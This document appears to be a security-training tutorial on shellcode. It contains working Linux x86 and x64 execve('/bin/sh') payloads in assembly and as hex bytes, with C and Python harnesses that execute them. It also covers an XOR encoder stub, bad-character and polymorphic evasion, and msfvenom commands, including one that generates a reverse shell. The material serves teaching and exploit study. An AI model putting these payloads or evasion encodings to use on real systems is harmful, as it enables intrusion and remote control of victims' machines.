mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2025-12-27 22:24:46 -05:00
631 lines
14 KiB
Markdown
631 lines
14 KiB
Markdown
# Shellcode Basics
|
|
|
|
## What is Shellcode?
|
|
|
|
**Shellcode** is a small piece of machine code that is injected into a vulnerable program to execute arbitrary commands. The name comes from its original purpose: spawning a command shell. Today, shellcode can perform any action: download files, create backdoors, escalate privileges, or execute any code.
|
|
|
|
### Key Characteristics
|
|
|
|
1. **Position-Independent** - Runs regardless of memory location
|
|
2. **Self-Contained** - No external dependencies
|
|
3. **Compact** - Small size to fit in limited buffers
|
|
4. **Avoids Bad Characters** - Works around input restrictions (null bytes, etc.)
|
|
|
|
## How Shellcode Works
|
|
|
|
### The Execution Flow
|
|
|
|
```
|
|
1. Vulnerability triggered (buffer overflow)
|
|
↓
|
|
2. Shellcode injected into memory
|
|
↓
|
|
3. Return address overwritten to point to shellcode
|
|
↓
|
|
4. Program returns/jumps to shellcode location
|
|
↓
|
|
5. Shellcode executes with program's privileges
|
|
↓
|
|
6. Attacker gains control (shell, backdoor, etc.)
|
|
```
|
|
|
|
## Anatomy of Shellcode
|
|
|
|
### Example: Linux x86 Shellcode (execve("/bin/sh"))
|
|
|
|
```assembly
|
|
; 32-bit Linux shellcode to spawn /bin/sh
|
|
section .text
|
|
global _start
|
|
|
|
_start:
|
|
; execve("/bin/sh", ["/bin/sh", NULL], NULL)
|
|
|
|
xor eax, eax ; Zero out EAX (0x00000000)
|
|
push eax ; Push NULL terminator for string
|
|
push 0x68732f2f ; Push "//sh" (reverse order, little-endian)
|
|
push 0x6e69622f ; Push "/bin" (reverse order)
|
|
mov ebx, esp ; EBX = pointer to "/bin//sh" string
|
|
|
|
push eax ; Push NULL (argv[1])
|
|
push ebx ; Push pointer to "/bin//sh" (argv[0])
|
|
mov ecx, esp ; ECX = pointer to argv array
|
|
|
|
cdq ; Zero out EDX (sets EDX = 0)
|
|
mov al, 0x0b ; syscall number for execve (11)
|
|
int 0x80 ; Invoke syscall
|
|
```
|
|
|
|
### Machine Code Representation
|
|
|
|
```c
|
|
unsigned char shellcode[] =
|
|
"\x31\xc0" // xor eax, eax
|
|
"\x50" // push eax
|
|
"\x68\x2f\x2f\x73\x68" // push 0x68732f2f
|
|
"\x68\x2f\x62\x69\x6e" // push 0x6e69622f
|
|
"\x89\xe3" // mov ebx, esp
|
|
"\x50" // push eax
|
|
"\x53" // push ebx
|
|
"\x89\xe1" // mov ecx, esp
|
|
"\x99" // cdq
|
|
"\xb0\x0b" // mov al, 0x0b
|
|
"\xcd\x80"; // int 0x80
|
|
```
|
|
|
|
**Size**: 25 bytes
|
|
|
|
## System Calls and Shellcode
|
|
|
|
### Linux x86 System Calls
|
|
|
|
System calls are how programs interact with the kernel:
|
|
|
|
```c
|
|
int 0x80 // x86 (32-bit) syscall instruction
|
|
syscall // x64 (64-bit) syscall instruction
|
|
```
|
|
|
|
**Register Convention (x86):**
|
|
- `EAX` - Syscall number
|
|
- `EBX` - 1st argument
|
|
- `ECX` - 2nd argument
|
|
- `EDX` - 3rd argument
|
|
- `ESI` - 4th argument
|
|
- `EDI` - 5th argument
|
|
|
|
**Common Syscall Numbers (x86):**
|
|
| Syscall | Number (decimal) | Number (hex) |
|
|
|---------|------------------|--------------|
|
|
| exit | 1 | 0x01 |
|
|
| read | 3 | 0x03 |
|
|
| write | 4 | 0x04 |
|
|
| execve | 11 | 0x0b |
|
|
| socket | 102 | 0x66 |
|
|
|
|
### execve() System Call
|
|
|
|
```c
|
|
int execve(const char *filename, char *const argv[], char *const envp[]);
|
|
```
|
|
|
|
**To execute /bin/sh:**
|
|
```c
|
|
execve("/bin/sh", ["/bin/sh", NULL], NULL);
|
|
```
|
|
|
|
**In Assembly:**
|
|
```assembly
|
|
mov eax, 11 ; execve syscall number
|
|
mov ebx, addr ; EBX = pointer to "/bin/sh"
|
|
mov ecx, args ; ECX = pointer to argv
|
|
mov edx, 0 ; EDX = NULL (envp)
|
|
int 0x80 ; Execute syscall
|
|
```
|
|
|
|
## Writing Shellcode from Scratch
|
|
|
|
### Step 1: Write High-Level Code
|
|
|
|
```c
|
|
#include <unistd.h>
|
|
|
|
int main() {
|
|
char *args[] = {"/bin/sh", NULL};
|
|
execve("/bin/sh", args, NULL);
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
### Step 2: Compile and Examine
|
|
|
|
```bash
|
|
# Compile
|
|
gcc -o test test.c
|
|
|
|
# Disassemble
|
|
objdump -d test | grep -A 20 "<main>"
|
|
|
|
# Or use GDB
|
|
gdb ./test
|
|
(gdb) disassemble main
|
|
```
|
|
|
|
### Step 3: Convert to Pure Assembly
|
|
|
|
```assembly
|
|
section .text
|
|
global _start
|
|
|
|
_start:
|
|
; Build the string "/bin/sh" on the stack
|
|
xor eax, eax
|
|
push eax ; NULL terminator
|
|
push 0x68732f2f ; "//sh"
|
|
push 0x6e69622f ; "/bin"
|
|
mov ebx, esp ; EBX points to "/bin//sh"
|
|
|
|
; Build argv array
|
|
push eax ; argv[1] = NULL
|
|
push ebx ; argv[0] = "/bin//sh"
|
|
mov ecx, esp ; ECX points to argv
|
|
|
|
; Set up syscall
|
|
cdq ; EDX = 0 (envp = NULL)
|
|
mov al, 0x0b ; execve syscall
|
|
int 0x80 ; Execute
|
|
```
|
|
|
|
### Step 4: Assemble and Extract
|
|
|
|
```bash
|
|
# Assemble with NASM
|
|
nasm -f elf32 shellcode.asm -o shellcode.o
|
|
|
|
# Link
|
|
ld -m elf_i386 shellcode.o -o shellcode
|
|
|
|
# Extract machine code
|
|
objdump -d shellcode
|
|
|
|
# Or use this to get hex bytes:
|
|
objdump -d shellcode | grep '[0-9a-f]:' | \
|
|
grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | \
|
|
tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | \
|
|
paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
|
|
```
|
|
|
|
### Step 5: Test the Shellcode
|
|
|
|
```c
|
|
// test_shellcode.c
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
unsigned char code[] =
|
|
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
|
|
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
|
|
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
|
|
|
|
int main() {
|
|
printf("Shellcode length: %zu bytes\n", strlen(code));
|
|
void (*func)() = (void(*)())code;
|
|
func();
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
```bash
|
|
# Compile with executable stack
|
|
gcc test_shellcode.c -o test_shellcode -fno-stack-protector -z execstack -m32
|
|
|
|
# Run
|
|
./test_shellcode
|
|
# Should spawn a shell!
|
|
```
|
|
|
|
## Common Shellcode Types
|
|
|
|
### 1. Bind Shell
|
|
|
|
Listens on a port for incoming connections:
|
|
|
|
```c
|
|
// Pseudo-code
|
|
socket(AF_INET, SOCK_STREAM, 0);
|
|
bind(sockfd, {port=4444}, ...);
|
|
listen(sockfd, 0);
|
|
accept(sockfd, ...);
|
|
dup2(clientfd, 0); // stdin
|
|
dup2(clientfd, 1); // stdout
|
|
dup2(clientfd, 2); // stderr
|
|
execve("/bin/sh", ...);
|
|
```
|
|
|
|
**Usage:**
|
|
- Attacker connects to victim's port 4444
|
|
- Gets shell access
|
|
|
|
### 2. Reverse Shell
|
|
|
|
Connects back to attacker's machine:
|
|
|
|
```c
|
|
// Pseudo-code
|
|
socket(AF_INET, SOCK_STREAM, 0);
|
|
connect(sockfd, {attacker_ip, attacker_port}, ...);
|
|
dup2(sockfd, 0);
|
|
dup2(sockfd, 1);
|
|
dup2(sockfd, 2);
|
|
execve("/bin/sh", ...);
|
|
```
|
|
|
|
**Usage:**
|
|
- Attacker listens on their machine
|
|
- Victim connects back
|
|
- Bypasses firewalls (outbound connection)
|
|
|
|
### 3. Staged Shellcode
|
|
|
|
**Stage 1** (Stager): Small shellcode that downloads larger payload
|
|
**Stage 2** (Payload): Full-featured backdoor/shell
|
|
|
|
**Advantages:**
|
|
- Fits in smaller buffers
|
|
- More flexible
|
|
- Can be updated/changed
|
|
|
|
### 4. Meterpreter-style
|
|
|
|
Advanced multi-function payload:
|
|
- File upload/download
|
|
- Port forwarding
|
|
- Privilege escalation
|
|
- Persistence mechanisms
|
|
|
|
## Avoiding Bad Characters
|
|
|
|
### The Problem
|
|
|
|
Some functions stop at certain bytes:
|
|
- `strcpy()` stops at `0x00` (null byte)
|
|
- `scanf()` stops at `0x0a` (newline)
|
|
- Some filters remove special characters
|
|
|
|
### Solution Techniques
|
|
|
|
#### Technique 1: Encoding
|
|
|
|
```assembly
|
|
; Instead of using null bytes directly:
|
|
mov eax, 0 ; Contains null bytes (\x00\x00\x00)
|
|
|
|
; Use:
|
|
xor eax, eax ; No null bytes (\x31\xc0)
|
|
```
|
|
|
|
#### Technique 2: String Building
|
|
|
|
```assembly
|
|
; Instead of:
|
|
push 0x0068732f ; Contains null byte
|
|
|
|
; Use:
|
|
xor eax, eax ; EAX = 0
|
|
push eax ; Push null byte separately
|
|
push 0x68732f2f ; Push "//sh" (no null)
|
|
```
|
|
|
|
#### Technique 3: SUB/ADD Encoding
|
|
|
|
```assembly
|
|
; To create 0x0b without using that byte:
|
|
mov al, 0x0c ; AL = 12
|
|
sub al, 0x01 ; AL = 11 (0x0b)
|
|
```
|
|
|
|
#### Technique 4: XOR Encoding
|
|
|
|
```python
|
|
# Encode entire shellcode with XOR
|
|
def xor_encode(shellcode, key=0x42):
|
|
encoded = bytes([b ^ key for b in shellcode])
|
|
|
|
# Decoder stub (to add before encoded shellcode)
|
|
decoder = (
|
|
b"\xeb\x0b" # jmp short +11
|
|
b"\x5e" # pop esi
|
|
b"\x31\xc9" # xor ecx, ecx
|
|
b"\xb1" + bytes([len(shellcode)]) # mov cl, length
|
|
b"\x80\x36" + bytes([key]) # xor byte [esi], key
|
|
b"\x46" # inc esi
|
|
b"\xe2\xf9" # loop -7
|
|
b"\xff\xe6" # jmp esi
|
|
b"\xe8\xf0\xff\xff\xff" # call -15
|
|
)
|
|
|
|
return decoder + encoded
|
|
```
|
|
|
|
### Finding Bad Characters
|
|
|
|
```python
|
|
#!/usr/bin/env python3
|
|
# Send all possible bytes and see which ones come through
|
|
|
|
# Generate test string with all bytes
|
|
test = bytes(range(1, 256)) # Excluding 0x00
|
|
|
|
# Send through vulnerable program and check what arrives
|
|
# Remove bytes that don't arrive = bad characters
|
|
```
|
|
|
|
## 64-bit Shellcode Differences
|
|
|
|
### Key Differences from 32-bit
|
|
|
|
1. **Registers**: 64-bit registers (RAX, RBX, RCX, etc.)
|
|
2. **Syscall**: Uses `syscall` instruction instead of `int 0x80`
|
|
3. **Syscall Numbers**: Different from 32-bit
|
|
4. **Calling Convention**: Different register usage
|
|
|
|
### Example: 64-bit execve Shellcode
|
|
|
|
```assembly
|
|
section .text
|
|
global _start
|
|
|
|
_start:
|
|
; execve("/bin/sh", ["/bin/sh", NULL], NULL)
|
|
|
|
xor rax, rax
|
|
push rax ; NULL terminator
|
|
mov rax, 0x68732f6e69622f2f ; "//bin/sh" in reverse
|
|
push rax
|
|
mov rdi, rsp ; RDI = pointer to "/bin//sh"
|
|
|
|
push 0 ; argv[1] = NULL
|
|
push rdi ; argv[0] = "/bin//sh"
|
|
mov rsi, rsp ; RSI = pointer to argv
|
|
|
|
xor rdx, rdx ; RDX = NULL (envp)
|
|
mov al, 59 ; execve syscall number (64-bit)
|
|
syscall ; Execute
|
|
```
|
|
|
|
**Machine Code:**
|
|
```c
|
|
"\x48\x31\xc0\x50\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
|
|
"\x50\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"
|
|
```
|
|
|
|
## Tools for Shellcode Generation
|
|
|
|
### msfvenom (Metasploit)
|
|
|
|
```bash
|
|
# Generate Linux x86 shellcode
|
|
msfvenom -p linux/x86/exec CMD=/bin/sh -f c
|
|
|
|
# Generate without bad characters
|
|
msfvenom -p linux/x86/exec CMD=/bin/sh -b '\x00\x0a\x0d' -f c
|
|
|
|
# Generate with encoder
|
|
msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/shikata_ga_nai -f c
|
|
|
|
# Generate reverse shell
|
|
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c
|
|
|
|
# List available payloads
|
|
msfvenom --list payloads | grep linux/x86
|
|
```
|
|
|
|
### pwntools
|
|
|
|
```python
|
|
from pwn import *
|
|
|
|
context.arch = 'i386'
|
|
context.os = 'linux'
|
|
|
|
# Generate shellcode
|
|
shellcode = asm(shellcraft.sh())
|
|
print(hexdump(shellcode))
|
|
|
|
# Or manually:
|
|
shellcode = asm("""
|
|
xor eax, eax
|
|
push eax
|
|
push 0x68732f2f
|
|
push 0x6e69622f
|
|
mov ebx, esp
|
|
push eax
|
|
push ebx
|
|
mov ecx, esp
|
|
mov al, 0x0b
|
|
int 0x80
|
|
""")
|
|
```
|
|
|
|
### Online Assemblers
|
|
|
|
- [Online Assembler and Disassembler](https://defuse.ca/online-x86-assembler.htm)
|
|
- [Shell Storm Shellcode Database](http://shell-storm.org/shellcode/)
|
|
- [Exploit Database Shellcodes](https://www.exploit-db.com/shellcodes)
|
|
|
|
## Testing Shellcode
|
|
|
|
### Method 1: C Wrapper
|
|
|
|
```c
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
unsigned char shellcode[] = "\\x31\\xc0...";
|
|
|
|
int main() {
|
|
printf("Shellcode length: %zu\n", strlen(shellcode));
|
|
printf("Executing shellcode...\n");
|
|
|
|
// Cast to function pointer and call
|
|
void (*func)() = (void(*)())shellcode;
|
|
func();
|
|
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
### Method 2: Python
|
|
|
|
```python
|
|
#!/usr/bin/env python3
|
|
import ctypes
|
|
|
|
shellcode = b"\x31\xc0\x50..."
|
|
|
|
# Allocate executable memory
|
|
memory = ctypes.create_string_buffer(shellcode, len(shellcode))
|
|
function = ctypes.cast(memory, ctypes.CFUNCTYPE(None))
|
|
|
|
print(f"[*] Shellcode length: {len(shellcode)}")
|
|
print("[*] Executing...")
|
|
|
|
# Execute
|
|
function()
|
|
```
|
|
|
|
### Method 3: GDB
|
|
|
|
```bash
|
|
# Create shellcode file
|
|
python3 -c "print('\x31\xc0\x50...', end='')" > shellcode.bin
|
|
|
|
# Test in GDB
|
|
gdb
|
|
(gdb) set {char[25]}$esp = {0x31, 0xc0, 0x50, ...}
|
|
(gdb) set $eip = $esp
|
|
(gdb) continue
|
|
```
|
|
|
|
## Polymorphic Shellcode
|
|
|
|
**Goal**: Make shellcode look different each time while maintaining functionality
|
|
|
|
### Technique 1: Variable Instruction Ordering
|
|
|
|
```assembly
|
|
; Original
|
|
mov eax, 11
|
|
mov ebx, addr
|
|
int 0x80
|
|
|
|
; Polymorphic variant 1
|
|
mov ebx, addr
|
|
mov eax, 11
|
|
int 0x80
|
|
|
|
; Polymorphic variant 2
|
|
xor eax, eax
|
|
mov al, 11
|
|
mov ebx, addr
|
|
int 0x80
|
|
```
|
|
|
|
### Technique 2: Garbage Instructions
|
|
|
|
```assembly
|
|
; Insert junk instructions that don't affect execution
|
|
nop
|
|
mov eax, eax ; Useless but valid
|
|
xchg eax, eax ; Another nop
|
|
```
|
|
|
|
### Technique 3: Dynamic Decoding
|
|
|
|
```assembly
|
|
; Each instance has different XOR key
|
|
; Decoder changes each time
|
|
```
|
|
|
|
## Alphanumeric Shellcode
|
|
|
|
**Constraint**: Only alphanumeric characters allowed (A-Z, a-z, 0-9)
|
|
|
|
**Why**: Some input filters only allow printable ASCII
|
|
|
|
**Technique**: Encode shellcode using only alphanumeric instructions
|
|
|
|
```assembly
|
|
; Limited instruction set:
|
|
PUSH/POP (0x50-0x5F)
|
|
INC/DEC (0x40-0x4F)
|
|
AND/SUB (some variations)
|
|
|
|
; Build more complex instructions through combining simple ones
|
|
```
|
|
|
|
**Tools**: `msfvenom` can generate alphanumeric shellcode
|
|
|
|
```bash
|
|
msfvenom -p linux/x86/exec CMD=/bin/sh \
|
|
--encoder x86/alpha_mixed -f c
|
|
```
|
|
|
|
## Debugging Shellcode
|
|
|
|
### Common Issues
|
|
|
|
**1. Segmentation Fault**
|
|
- Cause: Jumping to wrong address, bad instructions
|
|
- Debug: Use GDB, check each instruction
|
|
|
|
**2. Nothing Happens**
|
|
- Cause: Shellcode not executing, wrong syscall
|
|
- Debug: Verify shellcode placement and execution
|
|
|
|
**3. Invalid Instruction**
|
|
- Cause: Bad bytes, encoding errors
|
|
- Debug: Disassemble with `ndisasm` or `objdump`
|
|
|
|
### Debugging Workflow
|
|
|
|
```bash
|
|
# 1. Extract shellcode to file
|
|
python3 -c "print(b'\\x31\\xc0...'.decode('latin-1'), end='')" > sc.bin
|
|
|
|
# 2. Disassemble
|
|
ndisasm -b32 sc.bin
|
|
# or
|
|
objdump -D -b binary -m i386 sc.bin
|
|
|
|
# 3. Run in debugger
|
|
gdb ./shellcode_tester
|
|
(gdb) break *&code
|
|
(gdb) run
|
|
(gdb) stepi # Step through each instruction
|
|
(gdb) x/10i $eip # Examine next instructions
|
|
```
|
|
|
|
## Best Practices
|
|
|
|
1. **Keep it small** - Smaller shellcode fits in more exploits
|
|
2. **Avoid null bytes** - Use XOR, SUB, etc. to build values
|
|
3. **Test thoroughly** - Verify on target architecture
|
|
4. **Position-independent** - Don't use hardcoded addresses
|
|
5. **Document well** - Comment your assembly code
|
|
6. **Use tools** - Don't reinvent the wheel (msfvenom, pwntools)
|
|
7. **Check for bad chars** - Test with actual vulnerability
|
|
8. **Understand syscalls** - Know what you're calling
|
|
|
|
## Further Resources
|
|
|
|
- [Shellcode Database (Shell Storm)](http://shell-storm.org/shellcode/)
|
|
- [Exploit Database Shellcodes](https://www.exploit-db.com/shellcodes)
|
|
- [Phrack Article: Writing IA32 Shellcode](http://www.phrack.org/issues/49/14.html)
|
|
- [Linux Syscall Table](https://syscalls.kernelgrok.com/)
|
|
- [pwntools Documentation](https://docs.pwntools.com/)
|
|
|
|
---
|
|
|
|
**⚠️ Important**: Shellcode is a powerful technique that should only be used for legitimate security testing with proper authorization. Unauthorized use is illegal and unethical.
|
|
|